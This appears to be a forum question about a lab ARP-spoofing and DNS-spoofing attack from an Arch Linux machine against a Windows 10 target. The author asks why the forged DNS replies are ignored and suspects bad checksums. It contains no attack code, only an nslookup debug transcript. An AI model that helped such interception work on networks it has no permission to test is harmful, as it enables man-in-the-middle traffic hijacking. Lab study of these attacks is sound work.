Spoofed DNS answers ignored by target machine applications


Attacker: Arch Linux

Target: Windows 10

Scenario The attackers launches an ARP spoof attack to redirect all target traffic to the attacker. (This works)

The target sends DNS queries for domain name resolution to the attacker machine. (This works)

The attacker machine listens for this queries and if the query tries to resolve a specific domain (detectportal.firefox.com) sends an spoof DNS answer with the attacker’s ip. For all the other domains the queries are not answered and not even forwarded.

Wireshark on both attacker and target machine confirms the reception of the spoofed dns answers although the applications that triggered the dns resolution seems to ignore this answers and just timeout.

Example on target machine:

ipconfig /flushdns nslookup detectportal.firefox.com DNS request timed out.     timeout was 2 seconds. Server: UnKnown Address: 10.42.0.1  (my gateway ip and the ip being spoofed by the ARP attack)  DNS request timed out.     timeout was 2 seconds.  DNS request timed out.     timeout was 2 seconds.  DNS request timed out.     timeout was 2 seconds.  DNS request timed out.     timeout was 2 seconds. **** Request to UnKnown timed-out 

Wireshark confirms the DNS spoof answers are correct and correlates them to the queries.

Assumption:

I do not compute the ip header checksum nor the udp checksum, just put some value (i.e. 0xdead, 0xbeef, 0xcafe). Could it be the target machine dropping these packets AFTER wireshark picks them?